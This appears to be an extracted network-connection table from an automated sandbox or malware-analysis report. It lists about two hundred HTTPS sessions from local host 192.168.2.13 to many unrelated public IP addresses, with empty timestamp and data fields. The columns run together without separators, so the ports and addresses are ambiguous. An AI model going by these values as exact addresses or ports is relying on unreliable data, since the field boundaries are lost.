                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20476192.168.2.134360648.1.197.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20477192.168.2.1340104223.137.56.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20478192.168.2.1340824221.65.9.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20479192.168.2.1337428134.8.128.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20480192.168.2.1355376152.197.86.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20481192.168.2.1360544203.184.165.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20482192.168.2.1357912137.232.213.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20483192.168.2.1355956156.16.6.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20484192.168.2.13472081.192.222.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20485192.168.2.1354884121.20.23.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20486192.168.2.1348122184.115.113.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20487192.168.2.1358362197.121.188.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20488192.168.2.135373094.117.65.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20489192.168.2.1348126223.201.118.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20490192.168.2.1358736123.99.179.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20491192.168.2.1348786193.27.176.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20492192.168.2.1356384151.113.129.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20493192.168.2.133383857.11.186.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20494192.168.2.133458462.115.75.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20495192.168.2.134055657.23.67.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20496192.168.2.1348702182.217.213.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20497192.168.2.1336020182.159.118.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20498192.168.2.13470621.248.75.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20499192.168.2.1351272188.103.237.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20500192.168.2.1351992112.224.91.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20501192.168.2.1351426150.132.179.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20502192.168.2.1343968129.181.178.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20503192.168.2.1354688206.104.218.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20504192.168.2.1357906196.17.222.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20505192.168.2.13417364.3.172.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20506192.168.2.134723040.49.133.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20507192.168.2.134249096.244.165.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20508192.168.2.133607261.4.164.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20509192.168.2.1356746164.14.84.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20510192.168.2.1339348216.179.31.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20511192.168.2.135396088.239.124.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20512192.168.2.133477859.162.117.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20513192.168.2.1345494116.83.64.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20514192.168.2.13568242.255.76.55443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20515192.168.2.134351850.20.157.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20516192.168.2.1354996182.224.56.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20517192.168.2.133909085.140.57.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20518192.168.2.133954851.207.230.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20519192.168.2.1334624185.94.61.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20520192.168.2.133914413.19.248.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20521192.168.2.1344320107.22.239.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20522192.168.2.133309685.54.70.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20523192.168.2.1359992181.164.152.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20524192.168.2.1339790204.78.121.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20525192.168.2.1343054176.75.237.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20526192.168.2.134229823.8.160.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20527192.168.2.1346242109.197.18.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20528192.168.2.136076663.125.9.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20529192.168.2.135084666.123.179.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20530192.168.2.1352390179.171.71.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20531192.168.2.1340526202.43.150.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20532192.168.2.1355320198.143.157.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20533192.168.2.135310673.42.171.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20534192.168.2.1342858193.60.198.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20535192.168.2.135406875.70.146.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20536192.168.2.1349022156.219.213.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20537192.168.2.134290498.13.255.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20538192.168.2.1348192172.42.61.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20539192.168.2.1344638110.160.195.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20540192.168.2.1349696209.175.175.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20541192.168.2.1354178209.184.189.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20542192.168.2.1347630146.142.188.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20543192.168.2.1340570128.89.172.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20544192.168.2.1355988113.117.41.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20545192.168.2.1356038138.134.198.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20546192.168.2.135727877.56.224.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20547192.168.2.1349918180.245.219.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20548192.168.2.135495897.1.141.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20549192.168.2.1360672153.11.231.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20550192.168.2.135303894.197.95.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20551192.168.2.1337964205.12.102.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20552192.168.2.1335808184.193.227.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20553192.168.2.134306085.12.101.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20554192.168.2.1336996187.112.42.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20555192.168.2.1336526134.54.221.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20556192.168.2.1333796126.118.181.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20557192.168.2.135841689.199.25.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20558192.168.2.135396637.131.42.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20559192.168.2.134856048.226.209.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20560192.168.2.1351660218.241.189.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20561192.168.2.135471617.58.27.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20562192.168.2.134971445.193.159.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20563192.168.2.1360510104.197.25.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20564192.168.2.136053814.167.113.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20565192.168.2.134614253.140.2.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20566192.168.2.136002494.186.148.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20567192.168.2.134662666.80.204.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20568192.168.2.1344294113.90.7.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20569192.168.2.1352614221.215.162.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20570192.168.2.135532672.141.103.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20571192.168.2.133603424.247.122.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20572192.168.2.134772674.11.41.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20573192.168.2.1350830108.9.232.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20574192.168.2.134408641.123.74.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20575192.168.2.135404477.206.7.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20576192.168.2.13387821.182.183.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20577192.168.2.134136644.127.110.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20578192.168.2.134740850.98.106.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20579192.168.2.1350114121.197.225.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20580192.168.2.1342752176.121.133.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20581192.168.2.1356182126.28.176.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20582192.168.2.134742098.137.189.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20583192.168.2.133513031.238.220.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20584192.168.2.1339286117.101.41.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20585192.168.2.1344662180.193.195.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20586192.168.2.1344264157.114.235.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20587192.168.2.1357920114.132.157.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20588192.168.2.134994450.7.111.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20589192.168.2.135589491.28.182.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20590192.168.2.134819884.255.178.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20591192.168.2.1338980185.242.118.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20592192.168.2.1359726126.112.107.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20593192.168.2.1349746112.175.206.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20594192.168.2.136020620.196.86.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20595192.168.2.1338310131.141.201.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20596192.168.2.1342070138.200.211.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20597192.168.2.1352586158.140.163.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20598192.168.2.1332790181.228.223.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20599192.168.2.134090425.248.171.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20600192.168.2.135190218.7.1.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20601192.168.2.134730280.202.189.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20602192.168.2.1340732200.13.78.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20603192.168.2.135377688.80.52.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20604192.168.2.133689057.141.178.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20605192.168.2.13425641.50.35.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20606192.168.2.135562237.51.79.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20607192.168.2.1342072171.72.183.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20608192.168.2.133867296.144.195.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20609192.168.2.135792254.162.228.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20610192.168.2.134170017.42.45.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20611192.168.2.13411244.97.93.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20612192.168.2.1340030106.207.72.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20613192.168.2.1352966167.161.109.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20614192.168.2.135979253.64.174.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20615192.168.2.1357624114.216.237.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20616192.168.2.134824841.26.98.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20617192.168.2.1360086121.20.255.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20618192.168.2.1339360176.124.9.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20619192.168.2.1348316163.69.201.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20620192.168.2.13418704.71.133.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20621192.168.2.1336550152.92.83.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20622192.168.2.1336416140.244.16.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20623192.168.2.1342264125.34.144.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20624192.168.2.1345810147.31.250.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20625192.168.2.1341526207.249.78.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20626192.168.2.1357034112.90.163.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20627192.168.2.1345878216.192.83.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20628192.168.2.1354110211.52.2.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20629192.168.2.1355064204.214.137.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20630192.168.2.133553239.142.253.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20631192.168.2.1337394123.58.241.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20632192.168.2.1334238123.46.140.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20633192.168.2.1351118119.229.33.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20634192.168.2.1346462189.18.70.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20635192.168.2.135560641.239.160.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20636192.168.2.135869078.99.218.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20637192.168.2.1357440130.6.225.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20638192.168.2.136027632.222.118.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20639192.168.2.1339932198.81.224.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20640192.168.2.1349994134.177.169.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20641192.168.2.1359780172.185.47.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20642192.168.2.1343258184.183.100.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20643192.168.2.1351912146.194.80.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20644192.168.2.135263064.231.247.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20645192.168.2.1358110184.244.72.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20646192.168.2.1356160165.143.205.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20647192.168.2.1358462181.234.162.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20648192.168.2.133343695.238.191.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20649192.168.2.1349012216.102.38.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20650192.168.2.1332946115.32.212.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20651192.168.2.1356662121.202.239.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20652192.168.2.133358231.190.214.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20653192.168.2.134725862.35.87.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20654192.168.2.134015665.170.85.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20655192.168.2.1347072182.63.173.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20656192.168.2.135615464.148.27.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20657192.168.2.1338886143.241.255.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20658192.168.2.1333422149.57.191.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20659192.168.2.1340134107.8.215.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20660192.168.2.135124483.35.229.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20661192.168.2.1334210177.11.207.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20662192.168.2.1337494171.126.56.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20663192.168.2.13379424.101.173.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20664192.168.2.1350484106.15.152.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20665192.168.2.1347648158.110.229.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20666192.168.2.1340460176.168.96.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20667192.168.2.1347300204.180.96.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20668192.168.2.1350952173.245.182.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20669192.168.2.134167090.22.78.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20670192.168.2.1333296108.216.192.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20671192.168.2.1345850182.109.125.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20672192.168.2.1355326133.176.232.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20673192.168.2.1359826140.53.114.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20674192.168.2.136069481.24.99.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20675192.168.2.134453232.224.18.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20676192.168.2.1351464151.79.49.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20677192.168.2.1350996132.66.66.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20678192.168.2.1343388187.154.109.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20679192.168.2.135328676.153.34.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20680192.168.2.1358154155.61.237.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20681192.168.2.134791289.162.186.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20682192.168.2.135257436.244.123.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20683192.168.2.135153444.179.240.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20684192.168.2.1333546104.31.98.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20685192.168.2.133350471.11.48.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20686192.168.2.134895654.111.67.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20687192.168.2.1342078166.3.143.131443
                                                  TimestampBytes transferredDirectionData


